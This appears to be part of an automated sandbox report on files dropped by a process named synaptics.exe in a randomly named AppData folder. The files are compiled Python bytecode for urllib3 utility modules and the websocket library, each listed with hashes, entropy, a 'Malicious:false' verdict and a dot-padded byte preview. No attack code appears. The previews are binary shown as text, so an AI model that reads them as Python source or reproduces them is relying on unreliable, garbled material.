                                                                                                                                                                                                            SHA-256:A531D925A9764FB92075E6F1F70AD6D9CC3AF17C271AA9353EB278AFF4FA89DA
                                                                                                                                                                                                            SHA-512:7B59853AE8A5823FCF21E6425A763D547A38FEF99125FE0FEC04F6793FCDBD80C2F7B679CE8B7D9E81AE558F7FF92B7FCD67A31E888C553788D0EEA3339CD8C8
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........gj........................@...s....d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...e.j.e.j.e.e.e.j.e.e.f...f.....Z.e.j.r5d.d.l.m.Z...d&d.d...Z.e.d.d.f.d'd.d...Z.d(d.d...Z.d)d.d ..Z.d*d#d$..Z.e.d%..Z.d.S.)+.....)...annotationsN.....)...LocationParseError.....)..._DEFAULT_TIMEOUT.._TYPE_TIMEOUT)...BaseHTTPConnection..connr......return..boolc....................C...s....|.j...S.).z.. Returns True if the connection is dropped and should be closed.. :param conn: :class:`urllib3.connection.HTTPConnection` object.. )...is_connected).r......r.....TC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\urllib3\util\connection.py..is_connection_dropped....s......r......address..tuple[str, int]..timeoutr......source_address..tuple[str, int] | None..socket_options.._TYPE_SOCKET_OPTIONS | None..socket.socketc....................C...s$...|.\.}.}.|...d...r.|...d...}.d.}.t...}.z.|...d.....W.n...t.y*......t.d.|...d.....d...w.t...|.|.|.t.j...D.]O}.|.\.}.}.}.}.}.d.}.z(t...|
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1088
                                                                                                                                                                                                            Entropy (8bit):5.404442071401463
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:A/ZpGf5n/lIpWt84RzmQXvAFnT8adLRSfG7frY8lt6rn:Aut/Rt82m38apc8f7S
                                                                                                                                                                                                            MD5:870D302FDF3987872615D12191AEDBA3
                                                                                                                                                                                                            SHA1:2666C40F62B85C4BDC5EB18D659458ACA7E44A91
                                                                                                                                                                                                            SHA-256:6B1BC4787267276FF442B2FC564252A46840E109A03B841B363146903A03FD5A
                                                                                                                                                                                                            SHA-512:DB7DC0DE243A21F714343F58F8EAEAE65463A029AC1C9D62810FEC90EB5E66143B65F337E989FC8D72F4B88A89A56DE1AB2F65367E52DFA72BC659D1DC81F544
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g|........................@...sH...d.d.l.m.Z...d.d.l.Z.d.d.l.m.Z...e.j.r.d.d.l.m.Z.........d.d.d.d...Z.d.S.)......)...annotationsN.....)...Url.....)...ProxyConfig..proxy_url..Url | None..proxy_config..ProxyConfig | None..destination_scheme..str | None..return..boolc....................C...s4...|.d.u.r.d.S.|.d.k.r.d.S.|.j.d.k.r.|.r.|.j.r.d.S.d.S.).a?.... Returns True if the connection requires an HTTP CONNECT through the proxy... :param URL proxy_url:. URL of the proxy.. :param ProxyConfig proxy_config:. Proxy configuration from poolmanager.py. :param str destination_scheme:. The scheme of the destination. (i.e https, http, etc). NF..http..httpsT)...scheme..use_forwarding_for_https).r....r....r......r.....OC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\urllib3\util\proxy.py..connection_requires_http_tunnel....s..........................r....).NNN).r....r....r....r....r....r....r....r....)...__future__r......typing..urlr......TYPE
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):6212
                                                                                                                                                                                                            Entropy (8bit):5.647296227132136
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:Uj+t5xiDKV+DKYzQ2P7fRxa5jyGyT/aOMyjxMbsrHMCtkwTVvAJhK:bMKV+DKYzP7pxdCsxM4H/T5
                                                                                                                                                                                                            MD5:E0B5A3186A4F814D4C2BAB7BC06E9961
                                                                                                                                                                                                            SHA1:C6838256A61F9DE77F0BD6B3A3421C4AEA09777C
                                                                                                                                                                                                            SHA-256:D5B3D87653336C22B802E537B638FFE2387CF11D7B30E228307C2B04F35290D5
                                                                                                                                                                                                            SHA-512:26517915FEC108CB98F592D53E6E2F62E5FF2B4AD238CC210DD7D09834D48E31986D4A861250CF9DD33B64BDCDC8EC7505E2F84DD566EECD76E6BB9CC205C332
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...sd...U.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...e.j.r0d.d.l.m.Z...d.Z.e.g.d.....Z.d.Z.z.z.d.d.l.Z.W.n...e.yN......d.d.l.Z.Y.n.w.W.n...e.yY......Y.n.w.e.d.7.Z.z.d.d.l.Z.W.n...e.ym......Y.n.w.e.d.7.Z.G.d.d...d.e...Z.e.j.Z.d.e.d.<.e.j.e.e.f...Z.h.d...Z.............d6d7d.d ..Z d8d%d&..Z!d9d+d,..Z"G.d-d...d.e.j#..Z$d:d4d5..Z%d.S.);.....)...annotationsN)...b64encode)...Enum.....)...UnrewindableBodyError.....)...to_bytes)...Finalz.@@@SKIP_HEADER@@@)...accept-encoding..host..user-agentz.gzip,deflatez.,brz.,zstdc....................@...s....e.Z.d.Z.d.Z.d.S.)..._TYPE_FAILEDTELLr....N)...__name__..__module__..__qualname__..token..r....r.....QC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\urllib3\util\request.pyr....'...s........r....z.Final[_TYPE_FAILEDTELL].._FAILEDTELL>....Z.DELETEZ.CONNECT..GETZ.OPTIONSZ.TRACE..HEAD..keep_alive..bool | None..accept_encoding..bool | list[str] | str | None..user_agent..str | N
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2344
                                                                                                                                                                                                            Entropy (8bit):5.385742032153854
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:Hmhh16e6JQ+Nk7gkL2YMHhfpm7kmpx6nriZEviRo3C:86NGslvhaIds
                                                                                                                                                                                                            MD5:40CEDE068394D40DD48088DC8FEC4EF7
                                                                                                                                                                                                            SHA1:328F46C9B646C588B8281FAD491B4855173FC8A9
                                                                                                                                                                                                            SHA-256:BF187ADF3F06A338D3D44A1E581C1FDECC85AD8F7754F85720881CE7CF0EB3E5
                                                                                                                                                                                                            SHA-512:A49F839AB3BFAE82C31DC8392E139852C143FC79FBA6AADA8738EE48A424A1BCA88DDA29C57891D47292E7C574111EE722A1A1D17B5069CE86FD2CA659A26EB3
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...sV...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.d...Z.d.d.d...Z.d.d.d...Z.d.S.)......)...annotationsN)..!MultipartInvariantViolationDefect..StartBoundaryNotFoundDefect.....)...HeaderParsingError..obj..object..return..boolc....................C...s`...z.|.....W.S...t.y.......Y.n.w.z.|.j.W.S...t.y.......Y.n.w.z.|.j.d.u.W.S...t.y/......Y.t.d.....w.).zt. Checks whether a given file-like object is closed... :param obj:. The file-like object to check.. Nz)Unable to determine whether fp is closed.)...isclosed..AttributeError..closed..fp..ValueError).r......r.....RC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\urllib3\util\response.py..is_fp_closed....s ...................................r......headers..httplib.HTTPMessage..Nonec....................C...sn...t.|.t.j...s.t.d.t.|.....d.......d.}.|.....s#|.....}.t.|.t.t.f...r#|.}.d.d...|.j.D...}.|.s/|.r5t.|.|.d.....d.S.).a>.... Asserts whether all headers have been
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):15757
                                                                                                                                                                                                            Entropy (8bit):5.363472425674649
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:9f/8j12FuuccXjtRLJIkyuhvCF4+W8THjSbG9JJb2s5297Y:9JsuPVJvCOWDsG97297Y
                                                                                                                                                                                                            MD5:0F19A18869B1D2A9150115E1FFF056D4
                                                                                                                                                                                                            SHA1:C4823A2BAD341692A42B61FEAB410952418A6D2C
                                                                                                                                                                                                            SHA-256:D12E4406F8B2905E7E32177626A583383AE29B4FD35F09120C1DBFC48FEA0501
                                                                                                                                                                                                            SHA-512:1EA6F304231BAA2EE002A7D4F016F72815F3FA5A51D47D37D9E3998E30A451B758F3EAC048FB85F3E63209DA7464ED56A2D44BC2982A24616EF171936580CE15
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.H.......................@...s....d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...e.j.rWd.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...e...e...Z.G.d.d...d.e.j ..Z!G.d.d...d...Z"e"d...e"_#d.S.)......)...annotationsN)...takewhile)...TracebackType.....)...ConnectTimeoutError..InvalidHeader..MaxRetryError..ProtocolError..ProxyError..ReadTimeoutError..ResponseError.....)...reraise)...Self)...ConnectionPool)...BaseHTTPResponsec....................@...s6...e.Z.d.Z.U.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.S.)...RequestHistory..str | None..method..url..Exception | None..error..int | None..status..redirect_locationN)...__name__..__module__..__qualname__..__annotations__..r....r.....OC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\urllib3\util\retry.pyr....!...s................r....c....................@...s"...e.Z.d.Z.U.d.Z.e.g.d.....Z.e.g.d.....Z.e.g.d.....Z.d.Z.d.e.d.<.d.d.d.d.d.d.e.d.d.e.d.d.d.d.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):12469
                                                                                                                                                                                                            Entropy (8bit):5.651099613847479
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:UjBb/AE642qEOM00ueLG0d1JK9CZdFyKZA2MlJC9M7:2npEfBbLPfyKZmbC+7
                                                                                                                                                                                                            MD5:5DE50BAB354CA2B5C908129A56A830E3
                                                                                                                                                                                                            SHA1:4B8CD8DFC46D01BA5A61DF2534E19573BEAD29E1
                                                                                                                                                                                                            SHA-256:CE0F0A6D8B6DD5B3B89CCE15A942BFA7F7CEC40CAA52C1B6E55DA102AC624716
                                                                                                                                                                                                            SHA-512:3EF59E0F4580891AD4FBEA3B9271E7439C7EDFC9BA7B33C096A6C633C4EAED5869CAF07DB78D6B54D8805E76E8F002004BD959B6B79F022AEBF081AC6B5D4644
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g&K.......................@...s....U.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.Z.d.Z.d.Z.d.Z.d.g.Z.e.j.e.e.e.e.e.f...Z.d.d...d.D...Z.dcd.d...Z.ddd.d...Z.e.j.r~d.d.l.m.Z...d.d.l.m Z ..d.d.l!m.Z"..G.d.d ..d e d.d!..Z#i.Z$d"e%d#<.z_d.d.l.Z.d.d$l.m&Z&m.Z.m'Z'm(Z(m)Z)m*Z*m+Z+m,Z,m-Z-m.Z.m.Z.m/Z/..e+Z0e.r.e.e)e*e.j1j2e.j3e.j1j2d%k.r.e.j4n.d...s.d.Z.d&D.].Z5z.e6e/e5..e$e6e.d'e5......<.W.q...e7y.......Y.q.w.d.d.l!m.Z...W.n...e8y.......d(Z'd)Z(d*Z-d+Z.d...Z0Z+d,Z,Y.n.w.e.j9d e:d.f...Z;ded1d2..Z<dfd6d7..Z=dgd8d9..Z>............dhdidCdD..Z?e.j@.E.E.E.E.E.E.E.E.E.E.E.EdjdkdUdV....ZAe.j@.E.E.E.E.E.E.E.E.E.E.E.EdjdldXdV....ZA........................dmdldYdV..ZAdnd\d]..ZBdod_d`..ZC..dpdqdadb..ZDd.S.)r.....)...annotationsN)...unhexlify.....)...ProxySchemeUnsupported..SSLError.....)..._BRACELESS_IPV6_ADDRZ_RE.._IPV4_REFz.http/1.1c....................C...s....i.|.].\.}.}.|.t.t.|.d.....q.S...N)...getattr..hashlib)....0..le
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):3713
                                                                                                                                                                                                            Entropy (8bit):5.715191540693681
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:SY/R/mYkAMdqu1vkAlH2TIYxfyRGH0MYUFgAL8IzE+wqq3:SXjA2MAV07xjHTgh2Etqq3
                                                                                                                                                                                                            MD5:BD1B43CB6F5C37E4C3CBD0D181E67DA0
                                                                                                                                                                                                            SHA1:5F2247416D1F58DD2E6D465120D2A5BFA3431DD2
                                                                                                                                                                                                            SHA-256:6C9D758830B15F09983CFA74F9991DCB11F76707DB58530F128CA33D19F9CAD4
                                                                                                                                                                                                            SHA-512:5F0FBB9FCAD9A3C94133881DE42FF37A9788378720FAB2D7C45F3FB8F51419A6C330DEC76C7438E6B59BBD310CD55F3EB5447B8CA37D202E4C5C90C9F1BB4C30
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...s....d.Z.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z...e.j.r%d.d.l.m.Z...d.Z.G.d.d...d.e...Z...d!d"d.d...Z.d#d.d...Z...d$d%d.d ..Z.d.S.)&zHThe match_hostname() function from Python 3.5, essential when using SSL......)...annotationsN)...IPv4Address..IPv6Address.....)..._TYPE_PEER_CERT_RET_DICTz.3.5.0.1c....................@...s....e.Z.d.Z.d.S.)...CertificateErrorN)...__name__..__module__..__qualname__..r....r.....\C:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\urllib3\util\ssl_match_hostname.pyr........s........r......dn..typing.Any..hostname..str..max_wildcards..int..return..typing.Match[str] | None | boolc....................C...s....g.}.|.s.d.S.|...d...}.|.d...}.|.d.d.....}.|...d...}.|.|.k.r&t.d.t.|.........|.s2t.|.....|.....k...S.|.d.k.r<|...d.....n.|...d...sF|...d...rO|...t...|.......n.|...t...|.....d.d.......|.D.].}.|...t...|.......q]t...d.d...|.....d...t.j...}.|...|...S.).zhMatching according to RFC 6125, section 6.4.3..
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):9429
                                                                                                                                                                                                            Entropy (8bit):5.268270757474773
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:4330cuKX0ASvpkv9nfgC+JI/XdABK1sdIDv5YaBbcMhu:4330lKBSvp4hXdcYsyxBYWu
                                                                                                                                                                                                            MD5:34993F3D02A19E7999BE475EC3FB4B78
                                                                                                                                                                                                            SHA1:CAABAA63C55E641BCDF842AA976F646777E82C6C
                                                                                                                                                                                                            SHA-256:889F4110A15BAB878A73A28645AAB4479A7F15F7572DC9CE04FB4F26A730D73C
                                                                                                                                                                                                            SHA-512:742F76918888C6535563462B3033ED42BF1D60DCAB09845784AD681522E708F39D33EEBDA84B843CA8CED18FF9242A8C3A6CC7B141DC9E6339ACBC1A3BD49C63
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.".......................@...s....d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...e.j.r-d.d.l.m.Z...d.d.l.m.Z.m.Z...e.j.e.e.f...Z.e...d...Z.d.Z.G.d.d...d...Z.d.S.)......)...annotationsN.....)...ProxySchemeUnsupported)...Self.....)..._TYPE_PEER_CERT_RET.._TYPE_PEER_CERT_RET_DICT.._ReturnValuei.@..c....................@...s....e.Z.d.Z.d.Z.e.dsd.d.....Z.....dtdud.d...Z.dvd.d...Z.dwd.d...Z.dxd.d...Z.dydzd!d"..Z.d{d|d&d'..Z....#d}d~d,d-..Z.d.d.d0d1..Z.d.d.d2d3..Z...d.d.d.d.d4..d.d<d=..Z.d.d>d?..Z.d.d@dA..Z.e.j..Bd.d.dFdG....Z.e.j.d.dJdG....Z.d.d.dMdG..Z.d.dNdO..Z.d.dQdR..Z.d.dSdT..Z.d.dVdW..Z.d.dXdY..Z.d.d\d]..Z.d.d^d_..Z.d.d`da..Z.d.d.dcdd..Z.e.j.d.dgdh....Z.e.j.d.dkdh....Z.e.j.d.dndh....Z.....d.d.drdh..Z.d.S.)...SSLTransportaL.... The SSLTransport wraps an existing socket and establishes an SSL connection... Contrary to Python's implementation of SSLSocket, it allows you to chain. multiple TLS connections together. It's particularly useful if you need to. i
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):9609
                                                                                                                                                                                                            Entropy (8bit):5.134511317738487
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:b8vOMrflhdz+7V0MV8K7byybXiCDzQyFF/LCfAChn8l/qxzWOBGawWy8I81GZ5Di:4rn+l/ucy80CBXPqGrpjMKfQHcsyJO
                                                                                                                                                                                                            MD5:C56B1DFE35C0B5AE533BDC495B60E193
                                                                                                                                                                                                            SHA1:21F76BA527965D4F3DDE9FD5A99F5BF0A7A2221B
                                                                                                                                                                                                            SHA-256:FB88CCD2B6E5FA1EF10BFEBEFDEBAA5F66398B0BF087B2150E8C225F14541BC5
                                                                                                                                                                                                            SHA-512:6F4C42C7581A2CB670E35F0973C597467BCF4E99B22EF59D96ED458D3831FC41B1B624958C0537E187C3E3C263348E4C5E1FA584F9E9A6DC08558EAA53800919
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........gj(.......................@...s....U.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...e.j.r*d.d.l.m.Z...G.d.d...d.e...Z.e.j.Z.d.e.d.<.e.j.e.j.e.e.f.....Z.G.d.d...d...Z.d.S.)......)...annotationsN)...Enum)...getdefaulttimeout.....)...TimeoutStateError)...Finalc....................@...s....e.Z.d.Z.d.Z.d.S.)..._TYPE_DEFAULT.....N)...__name__..__module__..__qualname__..token..r....r.....QC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\urllib3\util\timeout.pyr........s........r....z.Final[_TYPE_DEFAULT].._DEFAULT_TIMEOUTc....................@...s....e.Z.d.Z.U.d.Z.e.Z.d.e.d.<.d.e.e.f.d$d.d...Z.d%d.d...Z.e.Z.e.d&d.d.....Z.e.d'd.d.....Z.e.d(d.d.....Z.d)d.d...Z.d*d.d...Z.d*d.d...Z.e.d+d d!....Z.e.d,d"d#....Z.d.S.)-..Timeouta....Timeout configuration... Timeouts can be defined as a default for a pool:.. .. code-block:: python.. import urllib3.. timeout = urllib3.util.Timeout(connect=2.0, read=7.0).. http = urllib3.PoolManager(timeout
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):11247
                                                                                                                                                                                                            Entropy (8bit):5.784417796827759
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:oVOJJgt54ZqlH/qh/QFYP0YU5HqDtR4qzFYqW1D5hOBdmpInwqH5qVcPoO8RqUvi:oVeJgt54ZqVqhoJxHqDtR4qxYqW1D5k3
                                                                                                                                                                                                            MD5:D1CD8F6D11C69B34AAB6D641FC1B659E
                                                                                                                                                                                                            SHA1:91595E4B7C6A9C217CA8B225CEFF5BC5E43B537F
                                                                                                                                                                                                            SHA-256:17067036F7730A65FA963E15C25C9E05F4B7A886FDFD5E92CDA28609BF2B38C7
                                                                                                                                                                                                            SHA-512:79C4F8F4FDAB3D319F6538A03E26778A4F734AEE92B4E7707C4EF06FA55B1292639C4EE143E3F34DFE12E8E5016F6C8B527E00AD5604B709122EA2033D22DDFC
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........gm;.......................@...s~...d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.Z.e...d...Z.e...d...Z.e...d.e.j.e.j.B...Z.d.Z.d.Z.d.j.e.e.d...Z.e.e.d...Z.g.d...Z.d.Z.d.d...d.d...e.D.......d...Z.d.e...d...Z.d.e...d...e...d...Z.d.Z.e...d...Z.e...d.e...d.....Z.e...d.e...d.....Z.e...d.e...d.....Z.e...d.e.d.d.......d.....Z.e...d e...d!....Z d"e.e.e.f...Z!e...e!e.j.e.j.B...Z"e#d#..Z$e#d$..Z%e$e%B.d%h.B.Z&e&d&d'h.B.Z'e'd(h.B...Z(Z)G.d)d*..d*e..*d*d+e.j+e,..f.d,e.j+e,..f.d-e.j+e,..f.d.e.j+e-..f.d/e.j+e,..f.d0e.j+e,..f.d1e.j+e,..f.g.....Z.e.j/dMd7d8....Z0e.j/dNd:d8....Z0dOd<d8..Z0dPd=d>..Z1e.j/dQd?d@....Z2e.j/dRdAd@....Z2dSdBd@..Z2dTdEdF..Z3dUdHdI..Z4dVdKdL..Z5d.S.)W.....)...annotationsN.....)...LocationParseError.....)...to_str)...http..httpsNz.%[a-fA-F0-9]{2}z.^(?:[a-zA-Z][a-zA-Z0-9+-]*:|/)zS^(?:([a-zA-Z][a-zA-Z0-9+.-]*):)?(?://([^\\/?#]*))?([^?#]*)(?:\?([^#]*))?(?:#(.*))?$z.(?:[0-9]{1,3}\.){3}[0-9]{1,3}z.[0-9A-Fa-f]{1,4}z.(?:{hex}:{hex}|{ipv4}))...hexZ.ipv4).r....Z.ls32).
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1218
                                                                                                                                                                                                            Entropy (8bit):5.063532623017494
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:c2LkVMQdXRjkhlcRtfGyz4tMXSwgpsqnud9Qzm+6IErGXTSu:OMQdBYhlcv5Wp1KQ9+GXmu
                                                                                                                                                                                                            MD5:79D6700519607FEA736A62CB5E4941C4
                                                                                                                                                                                                            SHA1:5B99D41E0BDFD87CB7344CF03A51AEE28423A4C4
                                                                                                                                                                                                            SHA-256:0AC4692035E1BC1B1F10650034B7A78513D1F51CEBC62E23922E27A90B90812C
                                                                                                                                                                                                            SHA-512:772DA70108C3BB81F7C6AD170A9729CD13832193F2429C0705513BA388D6E09C07881EF2D6D9B7DDFA94CA968D426781EA72E5CB225F6F1DA83E8FCEC2FC02A8
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........gz........................@...sN...d.d.l.m.Z...d.d.l.Z.d.d.l.m.Z.....d.d.d.d...Z...d.d.d.d...Z...d.d.d.d...Z.d.S.)......)...annotationsN)...TracebackType..x..str | bytes..encoding..str | None..errors..return..bytesc....................C....R...t.|.t...r.|.S.t.|.t...s.t.d.t.|...j.........|.s.|.r%|.j.|.p.d.|.p"d.d...S.|.....S...Nz.not expecting type z.utf-8..strict).r....)...isinstancer......str..TypeError..type..__name__..encode..r....r....r......r.....NC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\urllib3\util\util.py..to_bytes.......................r....r....c....................C...r....r....).r....r....r....r....r....r......decoder....r....r....r......to_str....r....r......tp..type[BaseException] | None..value..BaseException..tb..TracebackType | None..typing.NoReturnc....................C...s$...z.|.j.|.u.r.|...|.....|...d.}.d.}.w...N)...__traceback__..with_traceback).r....r....r....r....r....r......reraise....s................r%...).NN).r....r....r....r....r.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2397
                                                                                                                                                                                                            Entropy (8bit):5.158685510240039
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:ay6A4HN1SSpUpLQYvX7ws85K4CE8uG9G0N3Ae8wWv9O3ArDiPh:ay6A4HT1pWvX7h0mh9GcAFwWlIArDiPh
                                                                                                                                                                                                            MD5:6A121A67F6F6DC88B6F4F2C72D9DC369
                                                                                                                                                                                                            SHA1:E27C1D476D9263304F350E04AF29EDE086103AAE
                                                                                                                                                                                                            SHA-256:8F09A2F8FA15194F09121196A433FF280766934A8E59480AAF784057C1428200
                                                                                                                                                                                                            SHA-512:9E268E3D7EF317073F1CB3DC929D66D40F956F28E690E6F58CCB3061B1AAFBCDFA6B2B3B78B3184982D871823A7C74971704DA28CD8FA4339EC004D07779BE3E
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........gG........................@...s....d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.g.Z.......d.d.d.d...Z.......d.d.d.d...Z.d.d.d...Z.......d.d.d.d...a.d.d.d.d...Z.d.d.d.d...Z.d.S.)......)...annotationsN)...partial..wait_for_read..wait_for_writeF..sock..socket.socket..read..bool..write..timeout..float | None..returnc....................C...sb...|.s.|.s.t.d.....g.}.g.}.|.r.|...|.....|.r.|...|.....t.t.j.|.|.|...}.|.|...\.}.}.}.t.|.p/|.p/|...S.).N.2must specify at least one of read=True, write=True)...RuntimeError..appendr......selectr....).r....r....r....r....Z.rcheckZ.wcheck..fnZ.rreadyZ.wreadyZ.xready..r.....NC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\urllib3\util\wait.py..select_wait_for_socket!...s..........................r....c........................s^...|.s.|.s.t.d.....d.}.|.r.|.t.j.O.}.|.r.|.t.j.O.}.t...........|.|.....d...f.d.d...}.t.|.|.....S.).Nr....r......tr....r......list[tuple[int, int]]c........................s....|.d.u.r.|.d.9.}.....|...S.).Ni....).
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):993
                                                                                                                                                                                                            Entropy (8bit):5.484700831841922
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:Z5G9Zl4IpheU0E+4HQk1Gps2OJjGmfF4E+P:ZAl4+h0CH31KiJjGa7g
                                                                                                                                                                                                            MD5:B072B8EDDC61A7FE19D1D682615F600E
                                                                                                                                                                                                            SHA1:6F5DC0DF8AA433C7506F70640DD0C27B47FE9FBF
                                                                                                                                                                                                            SHA-256:04D9EF6B0EDC30360440F5EF76BF6CA11317AABDCA35AB8133179E43AC3DEA47
                                                                                                                                                                                                            SHA-512:68DF2922F6BCF185E47BE0846DF2BE0AAFC3921823FED0903F5EA9487CEE4BAF120506A040951F93E9258B9367D7CCC0A7E46DA1A2D4A8F924251BD44E982BDA
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.........gA........................@...sD...d.Z.d.d.l.T.d.d.l.m.Z.m.Z...d.d.l.T.d.d.l.T.d.d.l.T.d.d.l.T.d.Z.d.S.).ab....__init__.py.websocket - WebSocket client library for Python..Copyright 2024 engn33r..Licensed under the Apache License, Version 2.0 (the "License");.you may not use this file except in compliance with the License..You may obtain a copy of the License at.. http://www.apache.org/licenses/LICENSE-2.0..Unless required by applicable law or agreed to in writing, software.distributed under the License is distributed on an "AS IS" BASIS,.WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied..See the License for the specific language governing permissions and.limitations under the License.......)...*)...WebSocketApp..setReconnectz.1.8.0N)...__doc__Z._abnfZ._appr....r....Z._core.._exceptionsZ._logging.._socket..__version__..r....r.....OC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\websocket\__init__.py..<module>....s....................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
